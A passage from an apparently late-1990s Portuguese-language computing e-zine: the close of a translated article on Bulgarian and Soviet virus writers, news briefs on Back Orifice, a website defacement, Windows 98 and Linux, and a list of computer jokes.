vírus. A programação de vírus na URSS, se encontra no mesmo estágio que a Bulgária estava há três anos atrás. Entretanto, até agora apenas nove variantes de vírus conhecidos e apenas um novo vírus (bastante estúpido por sinal) foi criado lá (6 variantes do VIENNA, 3 do AMSTRAD , e um do OLD YANKEE ). Na primeira conferência de desenvolvedores de anti-vírus em Kiev ( novembro, 1990 ) foram reportados mais de 35 vírus russos. Alguns deles são variantes de vírus conhecidos, enquanto outros são completamente novos. Foi notado que os programadores de vírus soviéticos são menos qualificados do que os búlgaros, mas eles criam vírus muito mais destrutivos. Uma vez que as razões de se programar vírus na URSS são bastante parecidas as da Bulgária; uma vez que a programação de vírus ocorre numa escala mais larga; e uma vez que não tomadas providências pelas autoridades a fim de parar isso, é possível prever que nos próximos anos a URSS estará bem a frente da Bulgária na criação de vírus de computador e uma nova e muito maior quantidade de vírus virão de lá. Provavelmente, após um ano, vários (mais de dez) programadores de vírus com o nível de Dark Avenger aparecerão por lá. 6) O impacto dos vírus búlgaros na indústria de software nacional e ocidental Enquanto uma grande parte dos vírus existentes são produzidos na Bulgária, uma parte relativamente pequena deles conseguiram chegar ao ocidente. De mais de 160 vírus búlgaros, apenas alguns (DARK AVENGER, V2000, V2100, PHOENIX, DIAMOND, NOMENKLATURA, VACSINA, YANKEE DOODLE) estão relativamente difundidos. De acordo como John McAfee, quase 10% de todas infecções nos EUA são causadas pelos vírus búlgaros -- especialmente pelo vírus DARK AVENGER. Na Europa Ocidental este vírus divide a popularidade com YANKEE DOODLE e VACSINA. Dos vírus listados acima, a maior parte foi escrito por Dark Avenger -- todos exceto YANKEE DOODLE and VACSINA. Quase todos seus vírus (neste caso -- com a exceção do DIAMOND, que é o menos difundido) são extremamente destrutivos. Os vírus PHOENIX e NOMENKLATURA e corrompem a FAT de uma maneira tão sutil, que quando o usuário percebe o dano, não existe mais nenhum jeito de desinfetar os arquivos e nem mesmo descobrir quais foram danificados. A única maneira é reformatar o winchester. É difícil estimar o custo de todos estes danos causados pelos vírus búlgaros. Existem relatos da Alemanha falando em DM$ 10.000.00 (marcos alemães) causados apenas pelo vírus VACSINA. É provável, entretanto, que estes números sejam superestimados. O grande número de vírus búlgaros causa também danos indiretos a comunidade ocidental, mesmo que estes vírus não saiam da Bulgária, e apenas exemplos deles sejam enviados aos pesquisadores. Estes pesquisadores tem que desenvolver vacinas contra estes vírus (apenas para previnir caso um destes vírus escape um dia). Entretanto, eles gastam tempo e dinheiro. Além disso, o usuário é forçado a comprar novos anti-vírus (ou pagar por atualizações), para sentir-se seguro. Ao mesmo tempo, a criação e disseminação dos vírus búlgaros, causa sérios danos a economia búlgara. Na Bulgária, os vírus são muito mais disseminados. Mais do que 80% dos 160 vírus búlgaros conhecidos infectam grande parte dos computadores do país. É difícil, entretanto, avaliar, ou mesmo estimar o custo exato destes danos, uma vez que na Bulgária o termo "propriedade de informação digital" simplesmente não existe nos termos da lei. É o mesmo com o custo desta informação. De fato, a criação de vírus de computador causa danos indiretos a nossa economia. Primeiramente, uma grande quantidade de pessoas capazes estão usando seus intelectos para criar vírus destrutivos, ao invés de fazer algo útil. Segundo, o fato dos programadores búlgaros usarem seu tempo para criar vírus destrói suas reputações como um todo. Nenhuma empresa de software aceitaria negociar com programadores ou empresas de software búlgaras, porque existe o medo de que o software pode ser pirateado ou conter um vírus. 7) Conclusão A programação de vírus na Bulgária é um hobby bastante popular. A maioria dos programadores de vírus são conhecidos, mas nenhuma medida pode ser tomada contra eles. Seu trabalho causa grande dano a comunidade ocidental, assim como a economia nacional. Portanto, é necessário tomar medidas legais urgentemente; medidas que farão com que a programação de vírus e sua distribuição intencional sejam atos criminosos. Esta é a única maneira para parar ou, pelo menos reduzir o problema. --------------------------------- Notas de tradução * pesquisadores: Como não encontrei um termo melhor acabei utilizando este mesmo. Este termo se refere a pessoas envolvidas no desenvolvimento de programas anti-vírus. ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ¬ ¬ ¬ P o r a í ¬ ¬ ¬ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ Correios preparam serviço de fax online e reformulam telegrama A ECT está desenvolvendo um sistema que permitirá a transmissão de fax seguindo o mesmo procedimento. O novo serviço também será oferecido em parceria com os provedores de acesso e será cobrado na fatura mensal que eles enviam aos clientes. Contudo, a ECT começa a sentir os efeitos negativos de sua corrida à mídia online. Quatro meses após o lançamento do telegrama via Internet, os convênios com provedores não decolaram devido principalmente às falhas de planejamento. Segundo Dias da Silva, a principal causa do desinteresse das empresas é a complexidade do software. "No caso do telegrama, o provedor tinha que baixar cerca de 100 arquivos para operar o sistema. Estamos reduzindo esse número para dez", explica. Outro problema na implementação do telegrama online inclui o processamento das transações. "Acusamos incompatibilidade com alguns sistemas de autenticação. Estamos trabalhando para solucionar todas as falhas técnicas", afirma Dias da Silva. A ECT pretende reunir a equipe de vendas, no final deste mês, para relançar o telegrama junto aos provedores. A previsão de lançamento da carta via Internet é no início de setembro. Site relacionado: http://www.correios.com * * * Quase 25% dos empregados usa Internet para diversão durante o expediente Segundo estudo da SurfWatch Software, os trabalhadores gastam quase 25% do tempo de surfe na Web em sites que oferecem apenas diversão e que não têm nada a ver com seu emprego. A pesquisa foi realizada junto às 100 maiores companhias da revista Fortune, pequenas empresas, instituições de alta tecnologia, fábricas e setor de serviços dos Estados Unidos, Brasil, Colômbia e alguns países da Europa. Theresa Marcroft, diretora de marketing da SurfWatch, afirma que no início do ano a busca da Web para recreação tinha índice de 18% nas corporações. Hoje, os empregados procuram mais os sites de notícias (5%), pornografia (3%), investimentos (3%), entretenimento (2%) e esportes (1%). Entre os sites mais populares estão The Wall Street Journal, CNN, The New York Times, Playboy, Penthouse, Charles Schwab, E-Trade, Quote.com, TV Guide e ESPN. Os empregados que surfam através da Web para sua própria diversão durante o expediente estão começando a ser punidos legalmente por algumas companhias, segundo informação da SurfWatch. Se um empregado abrir o site da Playboy num monitor de 36 polegadas, provavelmente irá causar alvoroço na sala onde trabalha, diz Marcroft. Marcroft diz ainda que as empresas estão preocupadas com a possibilidade de seus funcionários divulgarem informações sigilosas em salas de chat. O número de empresas americanas que adotou políticas claras sobre o uso da Internet durante o horário de serviço aumentou de 30% em 1997 para 50% este ano, segundo a SurfWatch. As companhias também estão implementando softwares para filtrar ou monitorar as atividades corporativas de Internet, sendo que algumas já bloquearam o acesso para conteúdos de sexo explícito e entretenimento, afirma Marcroft. * * * Windows 98 é vulnerável ao bug do ano 2000 A Microsoft admitiu que o Windows 98 não está totalmente compatível com o ano 2000. A ocorrência do bug foi descoberta pela desenvolvedora de softwares inglesa Provet It 2000 durante testes com o novo sistema operacional. A falha acontece quando um computador com Win98, é reiniciado segundos antes da meia-noite. "A data do sistema ou não muda, ou pula para dois dias depois, sem alterar o ano", explicou um porta-voz da Microsoft na Inglaterra. Em vez de 1º janeiro de 1999, o computador irá ler 30 de dezembro de 1998 ou 2 de janeiro de 1999. Esse tipo de bug é raro, pois a máquina precisa ser reiniciada em um segundo específico antes da meia-noite. A dificuldade está justamente aí. Ninguém sabe que exato segundo provoca o erro de reconhecimento de data. A Microsoft diz que levará pelo menos quatro dias para reproduzir o problema para, só então, desenvolver uma solução. A empresa planeja atualizar o site do Windows 98 em poucos dias, para que os usuários possam baixar o patch para o bug. * * * ICMS pode ser cobrado de provedores Segundo informações, a Cotepe, Comissão permanente de Assessoramento Técnico e o Conselho Nacional Fazendário (Confaz), constituídos por Secretários da Fazenda dos Estados, está entendendo que os provedores de serviço de acesso à Internet estariam sujeitos ao recolhimento do ICMS - Imposto sobre Circulação de Mercadorias e Serviços, à alíquota de 25%, com a justificativa que tais serviços se caracterizam como serviços de telecomunicação. A mencionada posição, além de amarrar o desenvolvimento do Brasil, encarecendo os serviços de acesso à Rede Internet, em mais de 33% (trinta e três por cento), pois o imposto é calculado por dentro, fere o princípio constitucional dos provedores de acesso, pretendendo instituir tributo (ICMS) sobre serviços que, segundo a Constituição Federal não se encontram na esfera de incidência do ICMS. A posição da Abranet-SP e de suas associadas, tendo em vista os efetivos serviços praticados por ela e a correta interpretação das normas legais vigentes, é a de não aceitar a tributação dos serviços pelo ICMS, pois não executam qualquer serviço de comunicação. A Abranet-SP já esta contratando, com base em consultas prévias realizadas através de sua Diretoria Jurídica, renomados juristas para a defesa dos legítimos direitos das associadas. * * * Qualcomm confirma bug de segurança no Eudora A Qualcomm acaba de confirmar um buraco de segurança no programa de correio eletrônico Eudora, que permite a pessoas mal intencionadas enviar arquivos anexados a uma mensagem com objetivo de apagar documentos ou instalar vírus no computador da vítima. A informação foi divulgada pela Associated Press. O problema afeta as versões 4.0, 4.0.1 e 4.1 do Eudora rodando sobre o Microsoft Windows 95. Não está claro se o problema ocorre em outros sistemas operacionais. Segundo informações da Qualcomm, a correção para o problema deverá ser publicada no site da companhia ainda hoje. * * * Suporte Técnico: para quem gosta de desafio Raquel de Almeida Marques (*) Colaboradora O dia-a-dia da Informática em uma empresa é muito tumultuado. São impressoras travando, monitores queimando, drives engolindo disquetes, estações que não acessam o servidor e usuários muito, mas muito bravos. Às vezes, são problemas realmente técnicos. Às vezes, é o que nós da área de Informática chamamos de problema de BIOS (Bicho Ignorante Operando o Sistema). De qualquer forma, o suporte será sempre acionado. Se você gosta de desafios e não se incomoda de ser chamado nas horas de descanso, esta profissão foi feita para você. Em algumas empresas são chamados de Técnicos em Suporte e em outras, Analistas de Suporte. De maneira geral, estes profissionais são os responsáveis pela manutenção de toda a informática de uma empresa, atuando basicamente nas áreas de hardware, redes e resolução de dúvidas dos usuários. Perfil – E o que é necessário saber? Na verdade, o técnico em suporte deve possuir uma experiência bastante abrangente. Conhecimentos de manutenção de computadores, instalação e configuração de softwares e montagem, instalação e manutenção de redes devem ser profundos. Para quem está pensando em começar agora, a sugestão seria se aprofundar em rede NT e fazer algum curso de administração de rede Novell (que não morreu) e Unix (de grande utilidade ainda na Internet). Para valorizar o passe, não dispense as certificações. Possuem um peso incrível e ajudam uma pessoa sem experiência a entrar no mercado. Além disso, ser dinâmico e possuir inglês fluente ajudam, pois muitas vezes os problemas tornam-se complicados e o jeito é procurar auxílio na Internet, nos sites dos fornecedores que são, em sua maioria, em inglês. Se você gostou desta profissão, aposte nela. O mercado é muito abrangente e tende a crescer, afinal, qualquer empresa que possua um computador precisa de alguém para dar suporte. Quanto à remuneração? Na Baixada Santista, varia de 500 a 1500 reais. Em São Paulo, de 700 a 2500. Vale a pena para você?  (*) Raquel de Almeida Marques é consultora de informática, especializada em problemas e soluções para pequenas e médias empresas, ministrando treinamentos nessa área. Seu novo e-mail é raquelmarques@yahoo.com * * * SCSI em baixa Auxiliar Informática passa a dica: nas próximas semanas, haverá significativa baixa nos preços dos produtos SCSI, especialmente discos rígidos, devido ao esforço que os fabricantes estão desenvolvendo no sentido de torná-los padrão na indústria de computadores. Afinal, o padrão IDE, por exemplo, vem dando mostras de bastante fôlego na comparação de preços e velocidade operacional entre esses dois padrões. * * * Fechando as janelas Desta vez, quem está questionando a Microsoft é uma empresa bem conhecida por todos os internautas que vêem shows e outros tipos de transmissão ao vivo via Internet: os produtores do RealPlayer mostraram seu programa funcionando sob Windows-95 e como, depois de atualizar essas máquinas para Windows-98, começaram a aparecer mensagens de "arquivo desconhecido". A Netscape também já havia feito essa reclamação, e a resposta da Microsoft é sempre a mesma: o bug (erro) está no software das outras empresas. Só não explica como é que o Windows-98 também mostra incompatibilidades com os próprios produtos da Microsoft ... Portanto, vale o conselho dos avós: evite instalar em seu computador a primeira versão de um software, espere ao menos pela segunda versão corrigida e melhorada. Se bem que o Windows-98 não deixa de ser uma atualização como a outra, não contendo nenhum avanço extraordinário na tecnologia... * * * Deja News tem sistema de buscas em português O site de grupos de discussão Deja News mostrou que também está de olho nos usuários que não falam inglês, e lançou um novo sistema de buscas que suporta 17 línguas, entre elas o português. Segundo o CEO da empresa, Guy Hoffman, "30% das listas que o site agrupa são em língua não inglesa, o que demonstra claramente que o fenômeno das discussões via Internet não é apenas norte-americano". O novo software que será utilizado nas buscas irá permitir que o usuário utilize expressões em vários idiomas, com caracteres e padrões de construção de frases diversos, como no japonês e no norueguês. Site relacionado: http://www.dejanews.com * * * MindSpring oferece acesso Net via cabo A MindSpring Enterprises Inc.anunciou que vai oferecer acesso Net via cabo em partes do Alabama, Florida, Georgia e Carolina do Sul. Para tornar possível o serviço, a empresa irá comprar grande banda de transporte na rede de cabo da Knology Holdings Inc. Os usuários poderão descarregar informações à velocidade de 500 kilobits por segundo, conforme informaram fontes oficiais da companhia. enviado por Fredson * * * StarMedia erra na estratégia para o Brasil A presença da StarMedia no mercado brasileiro sempre causou expectativas. Primeiro provedor de conteúdo dos Estados Unidos a investir no Brasil, traz o peso de sócios do porte do Chase Manhattan Bank. Mas, até agora, o resultado tem ficado aquém do esperado. Na 12ª Fenasoft, a empresa aproveitou a feira para apresentar um novo produto: o Órbita. Mas, outra vez, o resultado foi decepcionante. O Órbita é um site de hospedagem de homepages pessoais gratuitas, aos moldes do Geocities. Não há nada do gênero no Brasil. As iniciativas existentes até agora eram modestas, quase amadoras, sem o suporte de um grande grupo. O Órbita tinha um mercado praticamente virgem. Mas a StarMedia errou na fórmula. Encheu os sites de anúncios - e, convenhamos, ninguém quer o logo rotatório da StarMedia "enfeitando" sua página pessoal. Com anúncios e o logo da empresa na parte superior da tela e menu de navegação na parte inferior, sobra ao pobre usuário uma janela estreita, sem a mínima condição de um trabalho de design digno. Parece que a StarMedia pensou em consolidar a sua marca e faturar um bocadinho com as páginas alheias. Só esqueceu de pensar no que quer o usuário. Não é a primeira vez em que a StarMedia tem a oportunidade de lançar um bom produto e acaba desperdiçando a chance. Há diversos serviços de grande potencial que foram simplesmente "encaixotados" como parte do site StarMedia. Perderam a identidade e o impacto. Dois exemplos são o site de busca Excite! e o noticiário da CBS Telenotícias. Mas o erro principal é estratégico. Insiste-se em posicionar a StarMedia como um site "latino-americano". Ora, com todo respeito aos nossos vizinhos, esse é um argumento que não ajuda a vender nada no Brasil. Alguém participaria de um chat apenas para se enturmar com "colegas" de Quito? Ou se anima a entrar num fórum de discussão sobre Simon Bolivar? Para piorar, o caráter "latino" do site se completa com páginas em legítimo "portunhol" - mal ou parcialmente traduzidas para o português. Assim não dá. * * * Hackers brasileiros são investigados Durante uma inspeção de rotina, a Nasa descobriu que hackers brasileiros tentaram, sem sucesso, invadir seus sistemas e entrar nos arquivos da agência espacial. A descoberta foi feita há dois meses, e o governo norte-americano pediu às autoridades brasileiras que o caso fosse investigado. Ontem, o Departamento de Crimes por Computador da Polícia Federal, disse já ter identificado os hackers, mas seus nomes serão mantidos em sigilo até que as suspeitas se confirmem. Um acordo entre o Brasil e os EUA está sendo estudado para uma possível punição aos infratores, já que por aqui a lei não prevê esse tipo de crime. * * * Segurança temia a ação de hackers A transmissão do depoimento de Clinton, ontem, foi um grande desafio para os técnicos de segurança em informação do governo. Eles trabalharam durante toda a semana para evitar que algum hacker conseguisse furar o cerco e ter acesso à transmissão. A teleconferência foi possível graças a cabos de fibra ótica, que fizeram a ligação entre a Sala dos Mapas da Casa Branca e a Corte Federal. O sinal de áudio e vídeo era criptografado de um lado da linha e decodificado do outro, o que tornava quase impossível a missão dos piratas da informática. "Os hackers amariam ter nas mãos o testemunho de Clinton, apenas pelo fato de poder mostrar que o captaram", disse à rede norte-americana CNN a especialista em segurança Ira Winkler. A maior preocupação dos técnicos, porém, estava no equipamento de TV que os jurados usaram para assistir ao depoimento presidencial. A radiação emitida pela tela do televisor pode ser captada com uma antena especial denominada Tempest. Se a proteção dos monitores não fosse bem feita, seria possível interceptar os sinais a uma distância de até 300 metros da Corte Federal. Não é difícil obter uma antena Tempest. Ela é vendida na Internet e custa cerca de US$ 800. Sua tecnologia também permite captar informação de monitores de computadores. Um hacker de Boston afirma que costuma captar informação de computadores dentro de uma casa ou de um escritório a partir do carro, estacionado do lado de fora. * * * GeoCities paga multa à FTC por violar a privacidade de usuários IDG Now! Sexta-feira, 14 de Agosto de 1998 14:26:10 O Geocities, que reúne a comunidade mais popular da rede, concordou em pagar a multa imposta pela Comissão Federal de Comércio (FTC) dos Estados Unidos por ter colhido e divulgado informações pessoais dos usuários. Este é o primeiro caso de invasão da privacidade online punido pela FTC e a instituição americana espera que o caso sirva de exemplo para outras empresas de Internet. No início do ano, a FTC acusou o Geocities de "falsificar os propósitos sobre a solicitação de informações pessoais de adultos e crianças". O caso ficou público no início de junho, quando o Geocities teve de apresentar uma série de documentos à Comissão de Valores Imobiliários e Câmbio (SEC) por conta de uma oferta inicial de ações (IPO) em bolsas de valores. O Geocities protestou contra a multa mais concordou em trabalhar junto à FTC para solucionar o caso. Especificamente, a FTC acusou o Geocities de revelar informações a respeito de seus membros para terceiros "que usaram os dados para atingir o grupo de usuários de uma maneira que os usuários não haviam permitido". A FTC também alegou que o Geocities não deixou claro que não era responsável pelo GeoKidz Club ou pelos debates realizados na área para crianças Enchanted Forest. Ambos os sites coletaram informações pessoais de crianças. No acordo finalizado junto à FTC, o Geocities condordou em publicar uma detalhada política de privacidade sobre como as informações fornecidas pelos usuários serão usadas e distribuídas e sobre como os usuários podem acessar e remover estas informações dos computadores do Geocities. A empresa também concordou em obter consentimento dos pais ou responsáveis antes de coletar informações sobre crianças menores de 12 anos. * * * Novo equipamento interrompe navegação não autorizada na rede O analista de sistemas e inventor Ricardo Bonnetti, 34, criou um novo equipamento capaz de bloquear a navegação na Internet. O objetivo é evitar acessos não autorizados. Apelidado pelo inventor de FAM (Filtro Anti Modem), o aparelhinho, do tamanho de uma saboneteira, funciona com uma bateria de 9 volts e fica conectado entre a linha telefônica e o modem do micro. Quando acionado, o FAM impede que o modem do PC receba ou envie dados para o provedor, bloqueando a navegação. A vantagem é que o aparelhinho de Bonetti consegue distinguir uma ligação telefônica comum (voz) de uma conexão via modem (dados). Assim, todos os telefones conectados ao FAM continuarão funcionando mesmo quando ele estiver acionado. Segundo Bonetti, o FAM será muito útil para evitar que modems clandestinos -- principalmente os modelos externos -- sejam conectados a micros ligados em rede, utilizando a própria linha telefônica para ter acesso à Internet. Com essa porta de entrada livre, a rede fica sujeita aos vírus e aos ataques dos hackers (piratas de computador). "A maioria das invasões de hackers acontece de dentro para fora das empresas", diz o inventor, que também participa de uma comissão de segurança de uma instituição financeira. O FAM, por enquanto, ainda não passa de um protótipo e não tem data certa para ser lançado no mercado, mas já existe uma empresa interessada em comercializar sua invenção, que deve chegar a R$ 60. Quem quiser conferir os detalhes do aparelho e de outras engenhocas curiosas pode visitar a Associação Nacional dos Inventores, que fica na rua Dr. Homem de Mello, 1.109, Perdizes (zona sudoeste). Tel. (011 3873-3211). * * * Hackers distribuem programa para violar PCs com Windows Um grupo de hackers conhecido como "Culto à Vaca Morta" planeja distribuir na Internet, na próxima segunda-feira, o software "Back Orifice". O nome do software é um jogo de palavras com a suíte de programas para pequenos escritórios Back Office, da Microsoft. Ele permite a qualquer pessoa controlar remotamente, sem permissão do usuário, micros baseados nos sistemas operacionais da Microsoft (Windows 95, 98, NT). O "Back Orifice" tem funcionamento semelhante aos softwares de acesso remoto utilizado pelos administradores de rede e de suporte dentro das redes corporativas. Com o programa, é possível instalar e capturar arquivos, apagar e editar textos e manipular bancos de dados e planilhas de cálculo que estejam armazenados no computador invadido. O que está na tela do usuário passa a ser visto na tela do computador do hacker. "Uma vez instalado o programa, o administrador remoto tem mais controle sobre o computador do que a pessoa que está sentada diante dele", avisa DilDog, hacker que ajudou a escrever algumas linhas de código do software do Vaca Morta. Edmund Muth, porta-voz da Microsoft, disse que a empresa não está preocupada com a ameça dos hackers. "Esse programa não é algo que devamos levar a sério", afirmou. "Até porque para que um hacker tenha controle total da máquina invadida, o programa precisa ser instalado no computador alvo, e isso só é possível fisicamente". Mesmo assim, a Microsoft achou melhor se prevenir. Já está trabalhando com a Internet Security Systems, uma empresa de Atlanta (EUA), no desenvolvimento de um software de segurança que detecte a presença do "Back Orifice" nos computadores. * * * Hackers invadem site da CBF MARIA ERCILIA 16/07/98 19h48 Hackers invadiram nesta quinta o site da CBF e substituíram a página de abertura por um texto que circula em diversas listas de discussão desde segunda-feira. O texto, no melhor estilo "teoria da conspiração", afirma que o Brasil teria "vendido" a Copa do Mundo, em troca de sediar a Copa de 2002. Os hackers colocaram no alto da página falsificada a frase "Welcome to the World Hacked Cup 98". O símbolo da CBF foi substituído por uma ilustração onde se lia "Confederação Bostial de Futebol". Uma tarja vermelha foi colocada sobre a foto da seleção. A página foi assinada por "sp1n", "asylum", "n4rfy", "blast" e "smux". Durante toda a tarde de quinta-feira o site da CBF permaneceu fora do ar. Neste tipo de ataque, o hacker descobre uma falha de segurança no computador que abriga o site e substitui os arquivos originais por outros de mesmo nome. A CBF provavelmente não tinha cópia de segurança (back-up) do site. Segundo Reinaldo Soares, gerente de informática da CBF, o caso "está sendo investigado". Ele afirmou que a página invadida, no endereço www.cbf.com.br, "não é a principal" e que estava menos protegida que a www.futebol.com, que se encontra num computador na França. Segundo "Ran", um programador que solicitou que sua identidade não fosse revelada, os quatro autores da invasão frequentam regularmente a rede de bate-papo internacional IRC. "Ontem tentei entrar em um dos canais brasileiros que frequentamos, e o tema era "Site da CBF hackeado". "O canal estava fechado, porque provavelmente eles estavam discutindo o assunto. Embora haja a assinatura de quatro pessoas na página, somente duas invadiram o site. Uma delas fez a invasão e a outra - o `blast´ fez o HTML." Os hackers usaram um programa chamado "exploit" para fazer a invasão. Este programa identifica furos de segurança num software. A página foi invadida em torno das 3h de quinta-feira. O texto dos hackers permaneceu no site até as 13h25, quando foi retirado pela administração do site da CBF. * * * Linux ganha apoio de Informix, Oracle e Netscape Ralphe Manzoni Jr. O Linux começa a ganhar respeito. Nas últimas semanas, companhias de peso como Informix, Oracle e Netscape anunciaram seus planos para o sistema operacional Unix desenvolvido pelo finlandês Linux Torvalds. É um sinal de que o software está abandonando os guetos de usuários fanáticos ou da academia (as estimativas indicam mais de 7 milhões espalhados pelo mundo) para conquistar adeptos no cenário corporativo. Além dos já citados, a Inprise (ex-Borland) e a Corel já contam com versões do InterBase 4 e do WordPerfect 7, respectivamente, prontos para rodar na plataforma Linux. O movimento desses gigantes deve influenciar outras empresas do mercado de informática a portar também seus sistemas para o novo ambiente operacional Unix. "Foi uma decisão muito séria para o mercado", declara José Augusto Tavares, gerente de Informática das Duchas Corona, empresa que planeja padronizar seus desktops com o Linux. Por que o Linux está atraindo uma legião cada vez maior de usuários ? Em primeiro lugar, o sistema operacional é distribuído gratuitamente pela Internet. Quem quiser comprar um CD com a cópia original e mais uma série de aplicativos (existem empresas que se especializaram em fazer este empacotamento) não gasta mais de US$ 50. Depois, ele é uma alternativa real e de baixo custo que não necessita de tanto poder do hardware. "Ele é uma alternativa viável de baixo custo para o Windows NT", reconhece Anna Célia Ferreira, gerente de Produto da Oracle. "Nos Estados Unidos, muitas corporações estão adotando-o". A empresa acabou de anunciar que vai portar seu banco de dados e o pacote ERP - o Oracle Applications - em plataforma Intel. "Só estamos fazendo isso porque ele é bastante estável". O gargalo para que as corporações apostem no Linux como sua plataforma corporativa ainda é o suporte. Como ele não tem um dono, nem é comercializado por uma única empresa, ninguém se responsabiliza pelos serviços caso algum problema ocorra. Mas este paradigma também está sendo quebrado. Empresas especializadas estão surgindo com o objetivo de prestar assistência técnica aos usuários. Preço baixo Desde que chegou ao mercado, o Linux foi consumido por programadores que ajudaram a desenvolver o sistema operacional. Motivo ? Linux Torvalds, o dono do kernel, liberou o código fonte gratuitamente. Essa é uma peculiaridade deste mercado, isto é, os usuários não estão dispostos a desembolsar muito dinheiro para comprar aplicações. Por esse motivo, quem aposta neste segmento tem que entregar o produto sem nenhum custo ou praticar preços baixos. Veja o que fez a Informix, que acabou de disponibilizar seu banco de dados para a plataforma Linux: "Não vamos cobrar nada", revela Ronaldo Amá, diretor de Consultoria e Treinamento da subsidiária brasileira. "É assim que funciona a comunidade e não adianta ir contra a maré". Por trás desse gratuito, existe, porém, outros interesses. A Informix está disponibilizando seu banco de dados para que desenvolvedores possam construir aplicações que suportem o produto. Se alguma empresa comprar estes aplicativos, via de regra terá que armazenar os dados num ambiente Informix. Neste caso, é cobrado US$ 100 por usuário/ano. "Queremos criar massa crítica", conclui Amá. Foi a mesma estratégia seguida pela Inprise. O InterBase 4, banco de dados de alta performance, está disponível para download pela Internet sem nenhum custo. Em breve, a companhia lançará a versão 5 também portada para o Linux. "Estamos apostando nesse mercado porque o Linux é superior a outros sistemas operacionais baseados em Intel", afirma Mike Tossy, diretor de Marketing da empresa. A Corel, por exemplo, cobra US$ 85 por uma cópia do WordPerfect. "Estamos neste mercado para ganhar dinheiro", explica George O'Brien, diretor de Vendas de Produtos Estratégicos da Corel, uma das primeiras empresas de peso a apostar na plataforma Linux. "Mas os preços têm que ser baixos o suficiente para atrair os usuários tradicionais do sistema". Marumbi, o Linux brasileiro O Linux tropical responde pelo nome de Marumbi. Ele é comercializado pela empresa paranaense Conectiva, via um acordo de distribuição com a Red Hat - uma das companhias que vende o Linux por US$ 49,95. No Brasil, é vendido o mesmo código comercializado pela Red Hat por R$ 49,00. "Seguimos o mesmo modelo de comercialização", explica Rodney Miyakawa, sócio da empresa. O Linux brasileiro conta, porém, com um empacotamento diferente do comercializado pela Red Hat. Além do sistema operacional, o CD inclui cerca de 500 aplicativos, um manual em português e o direito de suporte para a instalação do software via e-mail. Alguns comandos básicos foram traduzidos. Miyakawa informa que vendeu 3 mil CDs até agora. Retirado de: http://www.computerworld.com.br/computerworld/265/soft_01.htm ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ¬ ¬ ¬ R i s u s ¬ ¬ ¬ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ Estão num avião o piloto, o Bill Gates, um jovem passageiro não identificado, o Bill Clinton e o Dalai Lama. O piloto avisa que tem duas notícias para dar. A primeira ruim e a segunda péssima. A primeira é que o avião vai cair e a segunda que só estão disponíveis quatro paraquedas e que ele, como piloto, vai usar o primeiro. E se atira. Bill Clinton diz que é um líder muito importante e que o mundo precisa dele, pega outro e se atira. Bill Gates diz que é o cara mais inteligente do mundo e que o mundo não irá suportar sua perda e se atira. O Dalai Lama olha para o jovem e diz: - Meu filho, eu sou budista, tenho outras vidas por viver, sou mais velho e por isto podes usar o último paraquedas. Irei morrer tranqüilo. O jovem desconhecido responde: - Não se preocupe Dalai, temos dois paraquedas. O cara mais inteligente do mundo saltou com minha mochila! * * * Existem dois tipos de pessoas no mundo da informática, as que já perderam o HD e as que vão perder um dia. * * * Abençoados sejam os pessimistas, pois eles fizeram backups. - Você conhece o usuário? - Usuário? Que usuáro???? - Aquele que te conectou atrás do armário... * * * O Natal das pessoas viciadas em computador é diferente: no dia 25 de natal, o Papai Noel desce pelo cabo do modem, sai pela porta serial e diz "Feliz Natal, ROM, ROM ROM!" * * * Elas usam Sempre Livre... Eu uso Modems * * * Papai, por que o ímã não está pegando este diskette? * * * -/=*=\ CUIDADO!!! Se você tivesse um TK-85 isso seria uma nave inimiga. * * * No filme Independence Day não foi vírus que os americanos coloacaram no computador da Nave mãe... eles instalaram o Windows 95!!!! * * * Sua esposa e o seu Windows95 só quem gosta é o seu vizinho * * * O Casco do Titanic foi projetado pelo Windows 95. * * * O DOS nunca me disse: Excelent command or filename… * * * Eu gosto do Windows, ele é que não gosta de mim... * * * System error: Press F13 to continue * * * GPF = Gates Providing Features * * * Me mostre seu bookmark, e eu lhe direi que internauta tu és... * * * Meu micro não tem RAM, tem PERERECA. * * * Em matéria de rede, prefiro aquela feita no Ceará. * * * Tive um sonho! dir c: 98765797467456745398154 bytes free * * * Pentium?!!! Previro Escovium!!! * * * Abençoados sejam os pessimistas, eles fizeram backups. * * * Acalme-se, são somente 0's e 1's. * * * OUT OF MEMORY. Please use BIOTÔNICO FONTOURA. * * * Programa de computador: Estranha forma de vida que tem a capacidade de transformar comandos em mensagens de erro. * * * O chefe saiu: [T]etris, [P]rince of Persia, [F]1-GP? * * * Quanto mais inútil o programa, maior o manual. * * * Backup não encontrado: (H)a! H(a)! Ha(!). * * * Chips de computador, disponível em dois sabores: batata e silício. * * * O que você acha do código binário? a) 0 b) 1 c) n.d.a? * * * Kellogs Multi I/O. Com saída Cereal. * * * Quem é esse General Failure? Por que ele fica lendo meu drive C? * * * Quando tudo o mais falhar, leia o manual de instruções. * * * Press any key to continue or any other key to quit. * * * BAHIA SOFTWARES apresenta HOLO DOOM V.2 * * * Preserve o verde: use monitores CGA * * * Email do Rubinho Barrichelo: último.lugar@grid.fl.com * * * Email do Paulo Maluf: maluf@mas.faz.com.br * * * Diretor pergunta para suporte : Qual a diferença entre um Pentium 90 e um Windows 95 ??? * * * Fato verídico de uma grande coorporação. No dia em que a compra de um modem se torna necessário: SUPORTE-Precisamos de um modem DIRETOR- O que vc sugere ? SUPORTE- Sugiro um de 33.600. DIRETOR- Você tá louco...esse é muito caro ! SUPORTE- Tudo 